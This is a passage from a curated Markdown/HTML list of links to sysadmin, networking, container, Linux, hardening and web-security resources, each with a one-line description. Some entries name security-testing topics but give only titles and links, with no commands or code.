href="https://github.com/Netflix/security_monkey"><b>security_monkey</b></a> - monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/firecracker-microvm/firecracker"><b>firecracker</b></a> - secure and fast microVMs for serverless computing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/StreisandEffect/streisand"><b>streisand</b></a> - sets up a new server running your choice of WireGuard, OpenSSH, OpenVPN, and more.<br> </p> #### Networks &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.capanalysis.net/ca/"><b>CapAnalysis</b></a> - web visual tool to analyze large amounts of captured network traffic (PCAP analyzer).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/digitalocean/netbox"><b>netbox</b></a> - IP address management (IPAM) and data center infrastructure management (DCIM) tool.<br> </p> ##### :black_small_square: Labs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.networkreliability.engineering/"><b>NRE Labs</b></a> - learn automation by doing it. Right now, right here, in your browser.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ee.lbl.gov/"><b>LBNL's Network Research Group</b></a> - home page of the Network Research Group (NRG).<br> </p> #### Containers/Orchestration &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: CLI Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/gvisor"><b>gvisor</b></a> - container runtime sandbox.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bcicen/ctop"><b>ctop</b></a> - top-like interface for container metrics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/docker/docker-bench-security"><b>docker-bench-security</b></a> - is a script that checks for dozens of common best-practices around deploying Docker.<br> </p> ##### :black_small_square: Web Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/moby/moby"><b>Moby</b></a> - a collaborative project for the container ecosystem to assemble container-based system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://traefik.io/"><b>Traefik</b></a> - open source reverse proxy/load balancer provides easier integration with Docker and Let's encrypt.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kong/kong"><b>kong</b></a> - The Cloud-Native API Gateway.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rancher/rancher"><b>rancher</b></a> - complete container management platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/portainer/portainer"><b>portainer</b></a> - making Docker management easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jwilder/nginx-proxy"><b>nginx-proxy</b></a> - automated nginx proxy for Docker containers using docker-gen.<br> </p> ##### :black_small_square: Manuals/Tutorials/Best Practices <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wsargent/docker-cheat-sheet"><b>docker-cheat-sheet</b></a> - a quick reference cheat sheet on Docker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/veggiemonk/awesome-docker"><b>awesome-docker</b></a> - a curated list of Docker resources and projects.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yeasy/docker_practice"><b>docker_practice</b></a> - learn and understand Docker technologies, with real DevOps practice!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/docker/labs"><b>labs </b></a> - is a collection of tutorials for learning how to use Docker with various tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jessfraz/dockerfiles"><b>dockerfiles</b></a> - various Dockerfiles I use on the desktop and on servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way"><b>kubernetes-the-hard-way</b></a> - bootstrap Kubernetes the hard way on Google Cloud Platform. No scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jamesward/kubernetes-the-easy-way"><b>kubernetes-the-easy-way</b></a> - bootstrap Kubernetes the easy way on Google Cloud Platform. No scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dennyzhang/cheatsheet-kubernetes-A4"><b>cheatsheet-kubernetes-A4</b></a> - Kubernetes CheatSheets in A4.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kabachook/k8s-security"><b>k8s-security</b></a> - kubernetes security notes and best practices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://learnk8s.io/production-best-practices/"><b>kubernetes-production-best-practices</b></a> - checklists with best-practices for production-ready Kubernetes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/freach/kubernetes-security-best-practice"><b>kubernetes-production-best-practices</b></a> - kubernetes security - best practice guide.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hjacobs/kubernetes-failure-stories"><b>kubernetes-failure-stories</b></a> - is a compilation of public failure/horror stories related to Kubernetes.<br> </p> #### Manuals/Howtos/Tutorials &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Shell/Command line <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-bash-bible"><b>pure-bash-bible</b></a> - is a collection of pure bash alternatives to external processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-sh-bible"><b>pure-sh-bible</b></a> - is a collection of pure POSIX sh alternatives to external processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Idnan/bash-guide"><b>bash-guide</b></a> - is a guide to learn bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/denysdovhan/bash-handbook"><b>bash-handbook</b></a> - for those who wanna learn Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.bash-hackers.org/start"><b>The Bash Hackers Wiki</b></a> - hold documentation of any kind about GNU Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html"><b>Shell & Utilities</b></a> - describes the commands offered to application programs by POSIX-conformant systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jlevy/the-art-of-command-line"><b>the-art-of-command-line</b></a> - master the command line, in one page.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://google.github.io/styleguide/shellguide.html"><b>Shell Style Guide</b></a> - a shell style guide for Google-originated open-source projects.<br> </p> ##### :black_small_square: Text Editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vim.rtorr.com/"><b>Vim Cheat Sheet</b></a> - great multi language vim guide.<br> </p> ##### :black_small_square: Python <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://awesome-python.com/"><b>Awesome Python</b></a> - a curated list of awesome Python frameworks, libraries, software and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gto76/python-cheatsheet"><b>python-cheatsheet</b></a> - comprehensive Python cheatsheet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.pythoncheatsheet.org/"><b>pythoncheatsheet.org</b></a> - basic reference for beginner and advanced developers.<br> </p> ##### :black_small_square: Sed & Awk & Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://posts.specterops.io/fawk-yeah-advanced-sed-and-awk-usage-parsing-for-pentesters-3-e5727e11a8ad?gi=c8f9506b26b6"><b>Fโ€™Awk Yeah!</b></a> - advanced sed and awk usage (Parsing for Pentesters 3).<br> </p> ##### :black_small_square: \*nix & Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cyberciti.biz/"><b>nixCraft</b></a> - linux and unix tutorials for new and seasoned sysadmin.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tecmint.com/"><b>TecMint</b></a> - the ideal Linux blog for Sysadmins & Geeks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.omnisecu.com/index.php"><b>Omnisecu</b></a> - free Networking, System Administration and Security tutorials.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cirosantilli/linux-cheat"><b>linux-cheat</b></a> - Linux tutorials and cheatsheets. Minimal examples. Mostly user-land CLI utilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/snori74/linuxupskillchallenge"><b>linuxupskillchallenge</b></a> - learn the skills required to sysadmin.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://cb.vu/unixtoolbox.xhtml"><b>Unix Toolbox</b></a> - Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linux-kernel-labs.github.io/refs/heads/master/index.html"><b>Linux Kernel Teaching</b></a> - is a collection of lectures and labs Linux kernel topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://peteris.rocks/blog/htop/"><b>htop explained</b></a> - explanation of everything you can see in htop/top on Linux.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linuxguideandhints.com/"><b>Linux Guide and Hints</b></a> - tutorials on system administration in Fedora and CentOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NanXiao/strace-little-book"><b>strace-little-book</b></a> - a little book which introduces strace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/goldshtn/linux-tracing-workshop"><b>linux-tracing-workshop</b></a> - examples and hands-on labs for Linux tracing tools workshops.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bagder/http2-explained"><b>http2-explained</b></a> - a detailed document explaining and documenting HTTP/2.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bagder/http3-explained"><b>http3-explained</b></a> - a document describing the HTTP/3 and QUIC protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.manning.com/books/http2-in-action"><b>HTTP/2 in Action</b></a> - an excellent introduction to the new HTTP/2 standard.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/"><b>Let's code a TCP/IP stack</b></a> - great stuff to learn network and system programming at a deeper level.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/nginx-admins-handbook"><b>Nginx Admin's Handbook</b></a> - describes how to improve NGINX performance, security and other important things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/digitalocean/nginxconfig.io"><b>nginxconfig.io</b></a> - NGINX config generator on steroids.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/openssh"><b>openssh guideline</b></a> - is to help operational teams with the configuration of OpenSSH server and client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gravitational.com/blog/ssh-handshake-explained/"><b>SSH Handshake Explained</b></a> - is a relatively brief description of the SSH handshake.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://kb.isc.org/docs/using-this-knowledgebase"><b>ISC's Knowledgebase</b></a> - you'll find some general information about BIND 9, ISC DHCP, and Kea DHCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetlife.net/"><b>PacketLife.net</b></a> - a place to record notes while studying for Cisco's CCNP certification.<br> </p> ##### :black_small_square: Microsoft <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/infosecn1nja/AD-Attack-Defense"><b>AD-Attack-Defense</b></a> - attack and defend active directory using modern post exploitation activity.<br> </p> ##### :black_small_square: Large-scale systems <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/donnemartin/system-design-primer"><b>The System Design Primer</b></a> - learn how to design large-scale systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/binhnguyennus/awesome-scalability"><b>Awesome Scalability</b></a> - best practices in building High Scalability, High Availability, High Stability, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://engineering.videoblocks.com/web-architecture-101-a3224e126947?gi=a896808d22a"><b>Web Architecture 101</b></a> - the basic architecture concepts.<br> </p> ##### :black_small_square: System hardening <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cisecurity.org/cis-benchmarks/"><b>CIS Benchmarks</b></a> - secure configuration settings for over 100 technologies, available as a free PDF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://highon.coffee/blog/security-harden-centos-7/"><b>Security Harden CentOS 7</b></a> - this walks you through the steps required to security harden CentOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.lisenet.com/2017/centos-7-server-hardening-guide/"><b>CentOS 7 Server Hardening Guide</b></a> - great guide for hardening CentOS; familiar with OpenSCAP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/decalage2/awesome-security-hardening"><b>awesome-security-hardening</b></a> - is a collection of security hardening guides, tools and other resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/the-practical-linux-hardening-guide"><b>The Practical Linux Hardening Guide</b></a> - provides a high-level overview of hardening GNU/Linux systems.<br> </p> ##### :black_small_square: Security & Privacy <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackingarticles.in/"><b>Hacking Articles</b></a> - LRaj Chandel's Security & Hacking Blog.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/toniblyx/my-arsenal-of-aws-security-tools"><b>AWS security tools</b></a> - make your AWS cloud environment more secure.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://inventory.rawsec.ml/index.html"><b>Rawsec's CyberSecurity Inventory</b></a> - an inventory of tools and resources about CyberSecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tls.ulfheim.net/"><b>The Illustrated TLS Connection</b></a> - every byte of a TLS connection explained and reproduced.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices"><b>SSL Research</b></a> - SSL and TLS Deployment Best Practices by SSL Labs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://selinuxgame.org/index.html"><b>SELinux Game</b></a> - learn SELinux by doing. Solve Puzzles, show skillz.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://smallstep.com/blog/everything-pki.html"><b>Certificates and PKI</b></a> - everything you should know about certificates and PKI but are too afraid to ask.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://appsecco.com/books/subdomain-enumeration/"><b>The Art of Subdomain Enumeration</b></a> - a reference for subdomain enumeration techniques.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lifehacker.com/the-comprehensive-guide-to-quitting-google-1830001964"><b>Quitting Google</b></a> - the comprehensive guide to quitting Google.<br> </p> ##### :black_small_square: Web Apps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Main_Page"><b>OWASP</b></a> - worldwide not-for-profit charitable organization focused on improving the security of software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project"><b>OWASP ASVS 3.0.1</b></a> - OWASP Application Security Verification Standard Project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Santandersecurityresearch/asvs"><b>OWASP ASVS 3.0.1 Web App</b></a> - simple web app that helps developers understand the ASVS requirements.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/ASVS/tree/master/4.0"><b>OWASP ASVS 4.0</b></a> - is a list of application security requirements or tests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Testing_Project"><b>OWASP Testing Guide v4</b></a> - includes a "best practice" penetration testing framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/DevGuide"><b>OWASP Dev Guide</b></a> - this is the development version of the OWASP Developer Guide.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/wstg"><b>OWASP WSTG</b></a> - is a comprehensive open source guide to testing the security of web apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_API_Security_Project"><b>OWASP API Security Project</b></a> - focuses specifically on the top ten vulnerabilities in API security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/web_security.html"><b>Mozilla Web Security</b></a> - help operational teams with creating secure web applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Netflix/security-bulletins"><b>security-bulletins</b></a> - security bulletins that relate to Netflix Open Source.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/shieldfy/API-Security-Checklist"><b>API-Security-Checklist</b></a> - security countermeasures when designing, testing, and releasing your API.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://enable-cors.org/index.html"><b>Enable CORS</b></a> - enable cross-origin resource sharing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://appsecwiki.com/#/"><b>Application Security Wiki</b></a> - is an initiative to provide all application security related resources at one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GrrrDog/weird_proxies/wiki"><b>Weird Proxies</b></a> - reverse proxy related attacks; it is a result of analysis of various proxies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dfir.it/blog/2015/08/12/webshell-every-time-the-same-purpose/"><b>Webshells</b></a> - great series about malicious payloads.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/blog/practical-web-cache-poisoning"><b>Practical Web Cache Poisoning</b></a> - show you how to compromise websites by using esoteric web features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/research/tree/master/hidden_directories_leaks"><b>Hidden directories and files</b></a> - as a source of sensitive information about web application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bo0om.ru/en/"><b>Explosive blog</b></a> - great blog about cybersec and pentests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.netsparker.com/security-cookies-whitepaper/"><b>Security Cookies</b></a> - this paper will take a close look at cookie security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GitGuardian/APISecurityBestPractices"><b>APISecurityBestPractices</b></a> - help you keep secrets (API keys, db credentials, certificates) out of source code.<br> </p> ##### :black_small_square: All-in-one <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lzone.de/cheat-sheet/"><b>LZone Cheat Sheets</b></a> - all cheat sheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rstacruz/cheatsheets"><b>Danโ€™s Cheat Sheetsโ€™s</b></a> - massive cheat sheets documentation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://devhints.io/"><b>Rico's cheatsheets</b></a> - this is a modest collection of cheatsheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://devdocs.io/"><b>DevDocs API</b></a> - combines multiple API documentations in a fast, organized, and searchable interface.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cheat.sh/"><b>cheat.sh</b></a> - the only cheat sheet you need.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bitvijays.github.io/LFC-VulnerableMachines.html"><b>CTF Series : Vulnerable Machines</b></a> - the steps below could be followed to find vulnerabilities and exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/manoelt/50M_CTF_Writeup"><b>50M_CTF_Writeup</b></a> - $50 million CTF from Hackerone - writeup.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/j00ru/ctf-tasks"><b>ctf-tasks</b></a> - an archive of low-level CTF challenges developed over the years.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hshrzd.wordpress.com/how-to-start/"><b>How to start RE/malware analysis?</b></a> - collection of some hints and useful links for the beginners.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.kegel.com/c10k.html"><b>The C10K problem</b></a> - it's time for web servers to handle ten thousand clients simultaneously, don't you think?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.benjojo.co.uk/post/why-is-ethernet-mtu-1500"><b>How 1500 bytes became the MTU of the internet</b></a> - great story about the Maximum Transmission Unit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://poormansprofiler.org/"><b>poor man's profiler</b></a> - like dtrace's don't really provide methods to see what programs are blocking on.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nickcraver.com/blog/2017/05/22/https-on-stack-overflow/"><b>HTTPS on Stack Overflow</b></a> - this is the story of a long journey regarding the implementation of SSL.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://drawings.jvns.ca/"><b>Julia's Drawings</b></a> - some drawings about programming and unix world, zines about systems & debugging tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/corkami/collisions"><b>Hash collisions</b></a> - this great repository is focused on hash collisions exploitation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/in3rsha/sha256-animation"><b>sha256-animation</b></a> - animation of the SHA-256 hash function in your terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.ripe.net/Members/cteusche/bgp-meets-cat"><b>BGP Meets Cat</b></a> - after 3072 hours of manipulating BGP, Job Snijders has succeeded in drawing a Nyancat.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/benjojo/bgp-battleships"><b>bgp-battleships</b></a> - playing battleships over BGP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alex/what-happens-when"><b>What happens when...</b></a> - you type google.com into your browser and press enter?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vasanthk/how-web-works"><b>how-web-works</b></a> - based on the 'What happens when...' repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://robertheaton.com/2018/11/28/https-in-the-real-world/"><b>HTTPS in the real world</b></a> - great tutorial explain how HTTPS works in the real world.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://about.gitlab.com/2018/11/14/how-we-spent-two-weeks-hunting-an-nfs-bug/"><b>Gitlab and NFS bug</b></a> - how we spent two weeks hunting an NFS bug in the Linux kernel.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/"><b>Gitlab melts down</b></a> - postmortem on the database outage of January 31 2017 with the lessons we learned.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.catb.org/esr/faqs/hacker-howto.html"><b>How To Become A Hacker</b></a> - if you want to be a hacker, keep reading.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ithare.com/infographics-operation-costs-in-cpu-clock-cycles/"><b>Operation Costs in CPU</b></a> - should help to estimate costs of certain operations in CPU clocks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cstack.github.io/db_tutorial/"><b>Let's Build a Simple Database</b></a> - writing a sqlite clone from scratch in C.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://djhworld.github.io/post/2019/05/21/i-dont-know-how-cpus-work-so-i-simulated-one-in-code/"><b>simple-computer</b></a> - great resource to understand how computers work under the hood.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.troyhunt.com/working-with-154-million-records-on/"><b>The story of "Have I been pwned?"</b></a> - working with 154 million records on Azure Table Storage.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.top500.org/"><b>TOP500 Supercomputers</b></a> - shows the 500 most powerful commercially available computer systems known to us.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker"><b>How to build a 8 GPU password cracker</b></a> - any "black magic" or hours of frustration like desktop components do.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://home.cern/science/computing"><b>CERN Data Centre</b></a> - 3D visualizations of the CERN computing environments (and more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://howfuckedismydatabase.com/"><b>How fucked is my database</b></a> - evaluate how fucked your database is with this handy website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://krisbuytaert.be/blog/linux-troubleshooting-101-2016-edition/index.html"><b>Linux Troubleshooting 101 , 2016 Edition</b></a> - everything is a DNS Problem...<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://open.buffer.com/5-whys-process/"><b>Five Whys</b></a> - you know what the problem is, but you cannot solve it?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gvnshtn.com/maersk-me-notpetya/"><b>Maersk, me & notPetya</b></a> - how did ransomware successfully hijack hundreds of domain controllers?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://howhttps.works/"><b>howhttps.works</b></a> - how HTTPS works ...in a comic!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://howdns.works/"><b>howdns.works</b></a> - a fun and colorful explanation of how DNS works.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://postgresqlco.nf/en/doc/param/"><b>POSTGRESQLCO.NF</b></a> - your postgresql.conf documentation and recommendations.<br> </p> #### Inspiring Lists &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: SysOps/DevOps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kahun/awesome-sysadmin"><b>Awesome Sysadmin</b></a> - amazingly awesome open source sysadmin resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alebcay/awesome-shell"><b>Awesome Shell</b></a> - awesome command-line frameworks, toolkits, guides and gizmos.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/learnbyexample/Command-line-text-processing"><b>Command-line-text-processing</b></a> - finding text to search and replace, sorting to beautifying, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/caesar0301/awesome-pcaptools"><b>Awesome Pcaptools</b></a> - collection of tools developed by other researchers to process network traces.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zoidbergwill/awesome-ebpf"><b>awesome-ebpf</b></a> - a curated list of awesome projects related to eBPF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/leandromoreira/linux-network-performance-parameters"><b>Linux Network Performance</b></a> - where some of the network sysctl variables fit into the Linux/Kernel network flow.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dhamaniasad/awesome-postgres"><b>Awesome Postgres</b></a> - list of awesome PostgreSQL software, libraries, tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/enochtangg/quick-SQL-cheatsheet"><b>quick-SQL-cheatsheet</b></a> - a quick reminder of all SQL queries and examples on how to use them.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kickball/awesome-selfhosted"><b>Awesome-Selfhosted</b></a> - list of Free Software network services and web applications which can be hosted locally.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.archlinux.org/index.php/List_of_applications"><b>List of applications</b></a> - huge list of apps sorted by category, as a reference for those looking for packages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/InterviewMap/CS-Interview-Knowledge-Map"><b>CS-Interview-Knowledge-Map</b></a> - build the best interview map.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Tikam02/DevOps-Guide"><b>DevOps-Guide</b></a> - DevOps Guide from basic to advanced with Interview Questions and Notes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://issue.freebsdfoundation.org/publication/?m=33057&l=1&view=issuelistBrowser"><b>FreeBSD Journal</b></a> - it is a great list of periodical magazines about FreeBSD and other important things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bregman-arie/devops-interview-questions"><b>devops-interview-questions</b></a> - contains interview questions on various DevOps and SRE related topics.<br></p> ##### :black_small_square: Developers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kamranahmedse/developer-roadmap"><b>Web Developer Roadmap</b></a> - roadmaps, articles and resources to help you choose your path, learn and improve.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Checklist"><b>Front-End-Checklist</b></a> - the perfect Front-End Checklist for modern websites and meticulous developers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/thedaviddias/Front-End-Performance-Checklist"><b>Front-End-Performance-Checklist</b></a> - the only Front-End Performance Checklist that runs faster than the others.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rszalski.github.io/magicmethods/"><b>Python's Magic Methods</b></a> - what are magic methods? They're everything in object-oriented Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/satwikkansal/wtfpython"><b>wtfpython</b></a> - a collection of surprising Python snippets and lesser-known features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/twhite96/js-dev-reads"><b>js-dev-reads</b></a> - a list of books and articles for the discerning web developer to read.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RomuloOliveira/commit-messages-guide"><b>Commit messages guide</b></a> - a guide to understand the importance of commit messages.<br> </p> ##### :black_small_square: Security/Pentesting <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/qazbnm456/awesome-web-security"><b>Awesome Web Security</b></a> - a curated list of Web Security materials and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/joe-shenouda/awesome-cyber-skills"><b>awesome-cyber-skills</b></a> - a curated list of hacking environments where you can train your cyber skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/devsecops/awesome-devsecops"><b>awesome-devsecops</b></a> - an authoritative list of awesome devsecops tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jivoi/awesome-osint"><b>awesome-osint</b></a> - is a curated list of amazingly awesome OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hslatman/awesome-threat-intelligence"><b>awesome-threat-intelligence</b></a> - a curated list of Awesome Threat Intelligence resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a 